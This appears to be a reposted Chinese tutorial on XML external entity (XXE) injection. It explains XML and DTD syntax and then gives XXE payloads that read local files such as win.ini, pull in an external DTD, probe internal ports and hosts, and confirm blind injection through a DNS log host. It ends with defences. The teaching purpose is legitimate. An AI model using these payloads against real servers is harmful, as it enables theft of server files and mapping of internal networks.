XXE漏洞

这篇具有很好参考价值的文章主要介绍了XXE漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

XML基础

概述

XML是一种用于标记电子文件使其具有结构性的可扩展标记语言。

XML是一种灵活的语言,类似于HTML语言,但是并没有固定的标签,所有标签都可以自定义,其设计的宗旨是传输数据,而不是像HTML一样显示数据。

文档结构

XML声明

DTD文档类型定义

文档元素

XXE漏洞,网络安全,安全,网络

CDATA表示包含字符或者文本数据,这些文本将被解析器检查实体以及标记。被解析的字符数据不应当包含任意&、<、>;需要使用它们的实体来替换

&lt;         <            小于

&gt;        >            大于

&amp;    &           和号

&apos;   ·             省略号

&quot    “             引号

DTD基础

概述

DTD即文档类型定义,用来为XML文档定义语义约束

我们可以把DTD理解为一个模板,这个模板中定义了用户自己创建的根元素以及对应的子元素和根元素的合法子元素和属性

文档元素则必须以我们的DTD为模板,来对XML的元素的内容进行相应的规范化

DTD声明

内部声明

<!DOCTYPE 根元素 [元素声明]>

外部声明

<!DOCTYPE 根元素 SYSTEM “文件名/URL”>

DTD实体

内部普通实体

<!ENTITY 实体名称 “实体的值”>

外部普通实体

<!ENTITY 实体名称 SYSTEM “URI”>

<!TINTITY 实体名称 PUBLIC “DTD标识名” “公用DTD的URI”>

PUBLIC指公用DTD,其是某个权威机构指定,供特定行业或公司

SYSTEM是指该外部DYD文件是私有的,即我们自己创建的,没有公开发行,只是个人或在公司内部或者几个合作单位之间使用

公用DTD使用PUBLIC代替了原来的SYSTEM,并增加了DTD标识名

参数实体

内部       <!ENTITY % 实体名称 “实体值”>

外部       <!ENTITY % 实体名称   SYSTEM “URI”>

XXE漏洞

概述

XXE(XML External Entity)即XML外部实体注入攻击,发生在应用程序解 析XML输入时,没有禁止外部实体的加载,导致攻击者可以通过XML的外部实体获取服务器中本应被保护的数据。

在文档类型定义部分,可以引用外部的DTD文件,所以这里容易出现安全问题。XML解析器解析外部实体时支持多种协议,如:使用file协议可以读取本地文件内容;使用http协议可以获取web资源等。因此攻击者可以构造恶意的外部实体,当解析器解析了包含恶意外部实体的XML类型文件时,便会导致XXE攻击。

发现

首先寻找接受XML作为输入内容的端点。

可以通过修改HTTP的请求方法,修改Content—Type头部字段等等方法,然后看看应用程序的响应,看看程序是否解析了发送的内容,如果解析了,那么则可能有XXE攻击漏洞。

如果站点解析xml,就可以尝试引用实体和DTD

如果可以引用外部实体,则存在xxe漏洞.

XXE利用

读取任意文件

XXE漏洞,网络安全,安全,网络

<?xml version = "1.0"?>

<!DOCTYPE a [

<!ENTITY b SYSTEM "file:///C:/Windows/win.ini">

]>

<c>&b;</c>

XXE漏洞,网络安全,安全,网络

引入外部实体

XXE漏洞,网络安全,安全,网络

<?xml version = "1.0"?>

<!DOCTYPE a [

<!ENTITY % d SYSTEM "http://127.0.0.1/xxe.dtd">

%d;

]>

<c>&b;</c>

XXE漏洞,网络安全,安全,网络

<!ENTITY b SYSTEM "file:///C:/Windows/win.ini">

XXE漏洞,网络安全,安全,网络

探测内网端口

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [

<!ELEMENT foo ANY >

<!ENTITY port SYSTEM "http://192.168.10.133">

]>

<x>&port;</x>

端口存活,用时较短

XXE漏洞,网络安全,安全,网络

端口不存活,用时较长

XXE漏洞,网络安全,安全,网络

还可以探测内网主机存活

XXE漏洞,网络安全,安全,网络

Dnslog测试无回显

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE ANY [

<!ENTITY test SYSTEM "http://dnslogip"> ]>

<x>&test;</x>

XXE漏洞,网络安全,安全,网络

防御

方案一、使用开发语言提供的禁用外部实体的方法

php:

libxml_disable_entity_loader(true);
其他语言:

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

方案二、过滤用户提交的XML数据

关键词:SYSTEM和PUBLIC。文章来源地址https://www.toymoban.com/news/detail-560109.html

到了这里,关于XXE漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全漏洞分类详解

    一、漏洞类型 缓冲区溢出、跨站脚本、DOS攻击、扫描、SQL注入、木马后门、病毒蠕虫、web攻击、僵尸网络、跨站请求伪造、文件包含、文件读取、目录遍历攻击、敏感信息泄露、暴力破解、代码执行漏洞、命令执行、弱口令、上传漏洞利用、webshell利用、配置不当/错误、逻辑

    2024年02月04日
    浏览(39)
  • 信息安全-网络安全漏洞防护技术原理与应用

    网络安全漏洞: 又称为脆弱性,简称漏洞。 漏洞 一般是 致使网络信息系统安全策略相冲突的缺陷 ,这种缺陷通常称为 安全隐患 安全漏洞的影响: 主要有机密性受损、完整性破坏、可用性降低、抗抵赖性缺失、可控制性下降、真实性不保等 根据已经公开的漏洞信息,网络

    2024年02月11日
    浏览(53)
  • 网络安全之XSS漏洞

    Cross-Site Scripting(跨站脚本攻击)简称XSS,是一种 代码注入攻击 。XSS 攻击通常指的是利用网页的漏洞,攻击者通过巧妙的方法注入 XSS 代码到网页,因为浏览器无法分辨哪些脚本是可信的,导致 XSS 脚本被执行。XSS 脚本通常能够窃取用户数据并发送到攻击者的网站,或者冒充

    2024年02月06日
    浏览(45)
  • 【网络安全】文件包含漏洞解析

    博主昵称:跳楼梯企鹅 博主主页面链接: 博主主页传送门 博主专栏页面连接: 专栏传送门--网路安全技术 创作初心:本博客的初心为与技术朋友们相互交流,每个人的技术都存在短板,博主也是一样,虚心求教,希望各位技术友给予指导。 博主座右铭:发现光,追随光,

    2024年02月01日
    浏览(41)
  • 网络安全漏洞扫描技术

            网络安全漏洞扫描的作用是 发现系统中存在的潜在安全漏洞,评估系统的安全性,预防和减轻潜在的安全威胁,并满足合规性要求 。它对于提高系统的安全性、降低风险以及保护敏感数据和资产都具有重要的意义。网络安全漏洞扫描技术包括以下几种常见的方法

    2024年02月11日
    浏览(48)
  • 网络常见安全漏洞

    随着互联网的迅猛发展,网络安全问题日益严重。在网络世界中,各种常见的安全漏洞给人们的通信和数据安全带来了巨大的威胁。本文将介绍一些常见的网络安全漏洞,并提供一些防范措施。 跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞。攻击者利用网

    2024年02月10日
    浏览(47)
  • 【web安全】——XXE漏洞快速入门

    作者名:Demo不是emo  主页面链接 : 主页传送门 创作初心: 一切为了她 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: 网络安全,数据结构 每日emo: 该怎么开口呢?今晚天气不错,但还是想你了 目录  一:初识XXE漏洞 1.XXE简介  2.XML概念 二:XML语法简析 1.XML基础语

    2024年02月07日
    浏览(42)
  • 【XXE漏洞安全-全网最详细讲解】

    作者: liku君 公众号:里库的安全日记 博主微信:L2440710476(请备注来意) XXE(XML External Entity)漏洞是一种安全漏洞,出现在使用XML解析器的应用程序中。它允许攻击者利用可信任的XML扩展功能来执行恶意操作,如读取本地文件、发起远程网络请求或执行任意命令。 XXE漏洞

    2024年04月17日
    浏览(44)
  • 【网络安全】CSRF漏洞详细解读

    2023年04月15日
    浏览(43)
  • 网络安全漏洞管理十大度量指标

    当前,网络安全漏洞所带来的风险及产生的后果,影响到网络空间乃至现实世界的方方面面,通信、金融、能源、电力、铁路、医院、水务、航空、制造业等行业各类勒索、数据泄露、供应链、钓鱼等网络安全攻击事件层出不穷。因此,加强对漏洞管理的迫切性、重要性日趋

    2023年04月11日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包